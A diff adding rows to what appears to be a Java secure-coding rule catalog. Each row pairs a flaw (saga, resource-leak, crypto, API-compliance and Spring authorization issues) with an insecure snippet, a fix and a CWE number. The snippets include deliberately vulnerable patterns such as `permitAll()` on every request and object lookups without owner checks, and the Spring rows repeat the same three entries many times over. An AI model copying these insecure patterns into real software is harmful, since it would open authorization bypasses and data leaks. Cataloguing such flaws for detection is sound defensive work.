+| SGA-006 | Saga drift (Logic: strong): event published before transaction commit | `publisher.publish(evt); tx.commit();` | transactional outbox publish after commit | Java Saga Security (Logic: strong) | CWE-367 |
+| SGA-007 | Saga drift (Logic: strong): duplicate compensation due to retried message | `compensate(orderId);` | `compensateOnce(orderId, stepId)` with dedupe table | Java Saga Security (Logic: strong) | CWE-1209 |
+| SGA-008 | Saga drift (Logic: strong): no terminal state guard for cancelled saga | `if (failed) compensate();` | guard by finite-state-machine transition checks | Java Saga Security (Logic: strong) | CWE-841 |
+| SGA-009 | Saga drift (Logic: strong): concurrent sagas mutate same account without serialization | `balance-=amt;` in multiple workers | pessimistic lock or serialized command queue | Java Saga Security (Logic: strong) | CWE-362 |
+| SGA-010 | Saga drift (Logic: strong): compensation chain ignores external side-effect status | `refund(); markDone();` | verify refund receipt/id before marking done | Java Saga Security (Logic: strong) | CWE-1209 |
+| SGA-011 | Saga drift (Logic: strong): retry loop without backoff causes inconsistent multi-step replay | `while(!ok){step();}` | bounded retries + jitter + idempotent step token | Java Saga Security (Logic: strong) | CWE-1209 |
+| SGA-012 | Saga drift (Logic: strong): saga context mutable globally across requests | `static SagaCtx ctx` | request-scoped immutable saga context | Java Saga Security (Logic: strong) | CWE-664 |
+| SGA-013 | Saga drift (Logic: strong): missing timeout/expiry for in-flight saga | `status=IN_PROGRESS` forever | enforce TTL and dead-letter compensator | Java Saga Security (Logic: strong) | CWE-400 |
+| SGA-014 | Saga drift (Logic: strong): compensation executes with stale credentials | `compensator.call(oldToken)` | refresh short-lived token per compensation attempt | Java Saga Security (Logic: strong) | CWE-613 |
+| SGA-015 | Saga drift (Logic: strong): no audit trail for compensating actions | `compensate();` | append immutable audit event per step/compensation | Java Saga Security (Logic: strong) | CWE-778 |
+| SGA-016 | Saga drift (Logic: strong): success acknowledged before downstream durable commit | `ack(); downstream.write();` | ack only after downstream commit confirmation | Java Saga Security (Logic: strong) | CWE-1209 |
+| SGA-017 | Saga drift (Logic: strong): branching saga path lacks compensation mapping | `switch(step){...}` missing rollback case | define compensation matrix for each branch | Java Saga Security (Logic: strong) | CWE-691 |
+| SGA-018 | Saga drift (Logic: strong): orphaned saga records due to unhandled exceptions | `throw ex;` without finalizer | finally block marks FAILED and schedules compensation | Java Saga Security (Logic: strong) | CWE-703 |
+| SGA-019 | Saga drift (Logic: strong): irreversible side-effect before fraud check | `ship(); fraud.check();` | fraud/risk checks before irreversible step | Java Saga Security (Logic: strong) | CWE-840 |
+| SGA-020 | Saga drift (Logic: strong): compensator not authenticated/authorized | `/compensate` endpoint open | require mTLS/service principal + scope checks | Java Saga Security (Logic: strong) | CWE-306 |
+| SGA-021 | Saga drift (Logic: strong): multi-tenant saga IDs not scoped by tenant | `repo.findSaga(id)` | `repo.findSagaByTenant(id, tenantId)` | Java Saga Security (Logic: strong) | CWE-639 |
+| SGA-022 | Saga drift (Logic: strong): compensation can run after successful completion | `if(error) compensate` without final-state guard | only compensate from allowed states | Java Saga Security (Logic: strong) | CWE-841 |
+| SGA-023 | Saga drift (Logic: strong): external callback can mutate saga state without signature | `updateState(callback.payload)` | verify callback signature + nonce + expected state | Java Saga Security (Logic: strong) | CWE-345 |
+| SGA-024 | Saga drift (Logic: strong): replayable saga command messages | `consume(cmd)` | reject duplicate `cmdId` via replay cache | Java Saga Security (Logic: strong) | CWE-294 |
+| SGA-025 | Saga drift (Logic: strong): compensator swallows exceptions and reports success | `try{...}catch(Exception ignored){}` | propagate failure and enqueue retry with reason | Java Saga Security (Logic: strong) | CWE-391 |
+| SGA-026 | Saga drift (Logic: strong): unordered event handling breaks state machine | process events as-arrived | enforce ordering by sequence/version | Java Saga Security (Logic: strong) | CWE-662 |
+| SGA-027 | Saga drift (Logic: strong): outbox cleanup before consumer confirmation | `delete outbox row` early | delete only after ack/commit from consumer | Java Saga Security (Logic: strong) | CWE-1209 |
+| SGA-028 | Saga drift (Logic: strong): using local clock for global timeout decisions | `if(now>expires)` across nodes | use monotonic/shared time source | Java Saga Security (Logic: strong) | CWE-682 |
+| SGA-029 | Saga drift (Logic: strong): compensation writes bypass domain invariants | direct SQL update to status | route compensation through validated domain service | Java Saga Security (Logic: strong) | CWE-284 |
+| SGA-030 | Saga drift (Logic: strong): missing rollback of side cache/index updates | `cache.put();` no compensator | add compensating cache/index invalidation step | Java Saga Security (Logic: strong) | CWE-1209 |
+| RMG-001 | Resource leak (Logic: strong): DB pool max size unlimited/oversized | `maximumPoolSize=5000` | set bounded pool + circuit-breaker bulkhead | Java Resource Leaks (Logic: strong) | CWE-770 |
+| RMG-002 | Resource leak (Logic: strong): connection not closed in finally/try-with-resources | `Connection c = ds.getConnection();` | `try (Connection c = ds.getConnection()) { ... }` | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-003 | Resource leak (Logic: strong): HTTP client without connect/read timeout | `client.get(url)` default timeout | set strict connect/read/write timeouts | Java Resource Leaks (Logic: strong) | CWE-400 |
+| RMG-004 | Resource leak (Logic: strong): executor service created per request and never shutdown | `Executors.newFixedThreadPool(...)` in handler | reuse managed pool and shutdown gracefully | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-005 | Resource leak (Logic: strong): unbounded queue in thread pool | `new LinkedBlockingQueue<>()` | use bounded queue with rejection policy | Java Resource Leaks (Logic: strong) | CWE-770 |
+| RMG-006 | Resource leak (Logic: strong): file stream not closed on error path | `InputStream in = ...` | try-with-resources for all stream paths | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-007 | Resource leak (Logic: strong): Netty channel/future not disposed | open channel and forget close | close channel in listener/finalizer hooks | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-008 | Resource leak (Logic: strong): blocking I/O in event loop thread | `socket.read()` on reactor thread | offload blocking I/O to bounded worker pool | Java Resource Leaks (Logic: strong) | CWE-400 |
+| RMG-009 | Resource leak (Logic: strong): no socket timeout on outbound TLS call | `new Socket(host,port)` | `socket.connect(addr, timeout); socket.setSoTimeout(timeout)` | Java Resource Leaks (Logic: strong) | CWE-400 |
+| RMG-010 | Resource leak (Logic: strong): repeated parser instantiation with large buffers | `new Parser(hugeBuffer)` per msg | reuse pooled parser and cap buffer sizes | Java Resource Leaks (Logic: strong) | CWE-770 |
+| RMG-011 | Resource leak (Logic: strong): cache without size/TTL policy | `cache.put(k,v)` forever | enforce max entries and TTL eviction | Java Resource Leaks (Logic: strong) | CWE-400 |
+| RMG-012 | Resource leak (Logic: strong): temporary files not deleted | `Files.createTempFile(...)` | delete-on-close + scheduled cleanup | Java Resource Leaks (Logic: strong) | CWE-459 |
+| RMG-013 | Resource leak (Logic: strong): multipart upload stream not consumed/closed | parse part and return early | consume/close each part in finally | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-014 | Resource leak (Logic: strong): reactive subscriptions never disposed | `flux.subscribe()` unmanaged | keep disposable and dispose on lifecycle stop | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-015 | Resource leak (Logic: strong): gRPC channel per call without shutdown | `ManagedChannelBuilder...build()` each request | shared channel pool + `shutdownNow` on stop | Java Resource Leaks (Logic: strong) | CWE-400 |
+| RMG-016 | Resource leak (Logic: strong): JDBC statement/resultset leak | create statement without close | try-with-resources for statement/resultset | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-017 | Resource leak (Logic: strong): semaphore permits not released on exception | `sem.acquire(); doWork();` | release in finally block | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-018 | Resource leak (Logic: strong): lock held across remote I/O call | `lock.lock(); remote.call();` | avoid holding lock during remote/blocking calls | Java Resource Leaks (Logic: strong) | CWE-667 |
+| RMG-019 | Resource leak (Logic: strong): no deadline propagation to downstream | call downstream without deadline | propagate request timeout/deadline context | Java Resource Leaks (Logic: strong) | CWE-400 |
+| RMG-020 | Resource leak (Logic: strong): file descriptor leak from repeated open channel | open file channel in loop | close channel each iteration or batch | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-021 | Resource leak (Logic: strong): HTTP keepalive disabled causing socket churn | `Connection: close` everywhere | enable pooled keepalive with limits | Java Resource Leaks (Logic: strong) | CWE-400 |
+| RMG-022 | Resource leak (Logic: strong): deserializer allocates objects without upper bound | parse list size from input directly | enforce max object count and size budgets | Java Resource Leaks (Logic: strong) | CWE-770 |
+| RMG-023 | Resource leak (Logic: strong): slow DNS resolution without timeout/circuit breaker | `InetAddress.getByName` in hot path | async resolver with timeout and cache | Java Resource Leaks (Logic: strong) | CWE-400 |
+| RMG-024 | Resource leak (Logic: strong): `Thread.sleep` polling loops in worker threads | polling forever with sleep | event-driven signaling with bounded wait | Java Resource Leaks (Logic: strong) | CWE-400 |
+| RMG-025 | Resource leak (Logic: strong): image/pdf processing without memory cap | decode arbitrary file sizes | enforce max pages/pixels and memory quotas | Java Resource Leaks (Logic: strong) | CWE-770 |
+| RMG-026 | Resource leak (Logic: strong): message consumer prefetch too high | `prefetch=10000` | tune bounded prefetch and concurrency | Java Resource Leaks (Logic: strong) | CWE-770 |
+| RMG-027 | Resource leak (Logic: strong): no backpressure handling in reactive bridge | unbounded `onNext` forwarding | apply backpressure/drop/buffer limits | Java Resource Leaks (Logic: strong) | CWE-400 |
+| RMG-028 | Resource leak (Logic: strong): connection pool leak detection disabled | `leakDetectionThreshold=0` | enable leak detection with alerting | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-029 | Resource leak (Logic: strong): process execution output streams not drained | `process.waitFor()` only | drain stdout/stderr with timeout and close | Java Resource Leaks (Logic: strong) | CWE-772 |
+| RMG-030 | Resource leak (Logic: strong): retries on timeout without global budget | retry indefinitely on timeout | cap retries by total time budget | Java Resource Leaks (Logic: strong) | CWE-400 |
+| CRA-001 | Crypto-agility: hardcoded algorithm constant prevents migration | `String ALG="AES/CBC/PKCS5Padding";` | load algorithm/provider from secure config allowlist | Java Crypto Agility | CWE-1240 |
+| CRA-002 | Crypto-agility: fixed provider selection without fallback policy | `Cipher.getInstance(alg,"BC")` only | provider policy with preferred+fallback approved providers | Java Crypto Agility | CWE-1240 |
+| CRA-003 | Crypto-agility: hardcoded PBKDF iterations | `iter=10000` constant | iterations configurable via policy registry | Java Crypto Agility | CWE-1240 |
+| CRA-004 | Crypto-agility: hardcoded salt bytes reused globally | `salt="deadbeef..."` | per-secret random salt from secure RNG | Java Crypto Agility | CWE-1240 |
+| CRA-005 | Crypto-agility: hardcoded key length not policy-driven | `keyLen=128` | key length from centralized crypto policy | Java Crypto Agility | CWE-1240 |
+| CRA-006 | Crypto-agility: unsupported legacy algorithm allowed by config | allow `MD5`,`SHA1` in runtime list | deny legacy algs; allow approved suite only | Java Crypto Agility | CWE-327 |
+| CRA-007 | Sensitive memory retention: password stored in immutable String | `String pwd = req.password();` | use `char[]` and wipe after use | Java Crypto Agility | CWE-1037 |
+| CRA-008 | Sensitive memory retention: token cached in long-lived object | `this.token = token;` | keep short-lived reference and zeroize buffers | Java Crypto Agility | CWE-1037 |
+| CRA-009 | Sensitive memory retention: ByteBuffer with secret not cleared | use buffer and return without wipe | overwrite buffer before release | Java Crypto Agility | CWE-1037 |
+| CRA-010 | Sensitive memory retention: key material logged in debug path | `log.debug("key={}", key)` | never log key material; log key id only | Java Crypto Agility | CWE-532 |
+| CRA-011 | Crypto-agility: no algorithm version tag in ciphertext envelope | store raw ciphertext only | include `algVersion` metadata with ciphertext | Java Crypto Agility | CWE-1240 |
+| CRA-012 | Crypto-agility: no key rotation strategy hook | static key forever | key resolver supports versioned rotation | Java Crypto Agility | CWE-320 |
+| CRA-013 | Crypto-agility: TLS ciphersuite list hardcoded and stale | fixed old suites in code | load suites from policy and rotate periodically | Java Crypto Agility | CWE-327 |
+| CRA-014 | Sensitive memory retention: secret in exception message | `throw new IllegalStateException(secret)` | redact secrets from exceptions | Java Crypto Agility | CWE-209 |
+| CRA-015 | Sensitive memory retention: password char[] not wiped in finally | `char[] pwd = ...; auth(pwd);` | `try{auth(pwd);} finally {Arrays.fill(pwd,'\0');}` | Java Crypto Agility | CWE-1037 |
+| CRA-016 | Crypto-agility: KDF choice fixed in code (no Argon2 migration path) | `PBKDF2` hardwired | configurable KDF strategy with approved defaults | Java Crypto Agility | CWE-1240 |
+| CRA-017 | Crypto-agility: no provider health/approval checks | instantiate provider blindly | verify provider signature/version against allowlist | Java Crypto Agility | CWE-345 |
+| CRA-018 | Sensitive memory retention: secret copied across multiple Strings | `new String(secretBytes)` in many layers | keep byte[]/char[] minimal and wipe copies | Java Crypto Agility | CWE-1037 |
+| CRA-019 | Crypto-agility: hardcoded IV length/mode mismatch | fixed IV incompatible with selected mode | derive IV requirements from selected algorithm spec | Java Crypto Agility | CWE-1240 |
+| CRA-020 | Sensitive memory retention: heap dump exposure not mitigated for secrets | secrets in ordinary heap objects | store refs to HSM/KMS; minimize in-process secret residency | Java Crypto Agility | CWE-1037 |
+| V13J-001 | ASVS V13 Compliance: missing `Content-Type` strict check on JSON API (Compliance: ASVS-V13) | `@PostMapping("/api") public Resp create(@RequestBody Req req){...}` | reject when `Content-Type` is not exactly `application/json` or approved charset | Java API Compliance | CWE-436 |
+| V13J-002 | ASVS V13 Compliance: accepts wildcard media types on write endpoints (Compliance: ASVS-V13) | `consumes="*/*"` | set explicit `consumes="application/json"` | Java API Compliance | CWE-436 |
+| V13J-003 | ASVS V13 Compliance: request body parsed without media type guard (Compliance: ASVS-V13) | `objectMapper.readValue(body, Req.class)` | check header + parser allowlist before deserialization | Java API Compliance | CWE-436 |
+| V13J-004 | ASVS V13 Compliance: charset not validated for JSON payload (Compliance: ASVS-V13) | accepts `application/json; charset=iso-8859-1` | enforce UTF-8 only | Java API Compliance | CWE-436 |
+| V13J-005 | ASVS V13 Compliance: DTO schema allows unknown properties (Compliance: ASVS-V13) | default Jackson unknown fields ignored | configure `FAIL_ON_UNKNOWN_PROPERTIES=true` + explicit DTO allowlist | Java API Compliance | CWE-915 |
+| V13J-006 | ASVS V13 Compliance: request model lacks `additionalProperties=false` equivalent (Compliance: ASVS-V13) | map-like payload merged into entity | use strict DTO and reject extra fields | Java API Compliance | CWE-915 |
+| V13J-007 | ASVS V13 Compliance: bean binding permits mass assignment fields (Compliance: ASVS-V13) | binds `role`,`isAdmin`,`ownerId` from client | bind only whitelisted DTO fields | Java API Compliance | CWE-915 |
+| V13J-008 | ASVS V13 Compliance: polymorphic JSON type info on public input (Compliance: ASVS-V13) | `@JsonTypeInfo(use=Id.CLASS)` | disable type info for external payloads | Java API Compliance | CWE-915 |
+| V13J-009 | ASVS V13 Compliance: API response missing `X-Content-Type-Options: nosniff` (Compliance: ASVS-V13) | no nosniff header | always set `X-Content-Type-Options: nosniff` | Java API Compliance | CWE-16 |
+| V13J-010 | ASVS V13 Compliance: API response missing `Content-Security-Policy` on browser-consumed JSON docs (Compliance: ASVS-V13) | no CSP header | set strict CSP for API docs/static responses | Java API Compliance | CWE-16 |
+| V13J-011 | ASVS V13 Compliance: API over HTTPS missing HSTS header (Compliance: ASVS-V13) | no `Strict-Transport-Security` | set HSTS with long max-age and includeSubDomains | Java API Compliance | CWE-319 |
+| V13J-012 | ASVS V13 Compliance: actuator/docs endpoints skip security headers filter (Compliance: ASVS-V13) | filter excludes `/actuator` | apply headers filter to all HTTP responses | Java API Compliance | CWE-16 |
+| V13J-013 | ASVS V13 Compliance: OpenAPI endpoint allows text/html with sniffing risk (Compliance: ASVS-V13) | docs served without explicit content type and nosniff | set `application/json` + nosniff | Java API Compliance | CWE-436 |
+| V13J-014 | ASVS V13 Compliance: error handler returns content type inconsistent with body (Compliance: ASVS-V13) | returns JSON string with `text/plain` | return typed JSON response | Java API Compliance | CWE-436 |
+| V13J-015 | ASVS V13 Compliance: proxy/gateway strips downstream security headers (Compliance: ASVS-V13) | overwrite/omit CSP/HSTS/nosniff | preserve and enforce required headers at edge | Java API Compliance | CWE-693 |
+| V13J-016 | ASVS V13 Compliance: endpoint consumes XML unexpectedly in JSON API (Compliance: ASVS-V13) | accepts `application/xml` | disable unsupported content types | Java API Compliance | CWE-436 |
+| V13J-017 | ASVS V13 Compliance: schema validation skipped for PATCH payloads (Compliance: ASVS-V13) | apply partial merge on raw map | validate patch schema and forbid extra keys | Java API Compliance | CWE-915 |
+| V13J-018 | ASVS V13 Compliance: nullable/union payload fields bypass strict validation (Compliance: ASVS-V13) | use `Object` for critical fields | use strict typed fields + constraints | Java API Compliance | CWE-20 |
+| V13J-019 | ASVS V13 Compliance: inconsistent API content negotiation causes fallback parser (Compliance: ASVS-V13) | parser fallback on unknown media type | fail closed on unsupported media type | Java API Compliance | CWE-436 |
+| V13J-020 | ASVS V13 Compliance: API gateway route missing uniform header policy for V13 set (Compliance: ASVS-V13) | per-route ad hoc headers | centralize policy for HSTS/CSP/nosniff and strict content-type | Java API Compliance | CWE-16 |
+| IFJ-001 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-002 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-003 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-004 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-005 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-006 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-007 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-008 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-009 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-010 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-011 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-012 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-013 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-014 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-015 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-016 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-017 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-018 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-019 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-020 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-021 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-022 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-023 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-024 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-025 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-026 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-027 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-028 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-029 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-030 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-031 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-032 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-033 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-034 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-035 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-036 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-037 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-038 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-039 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
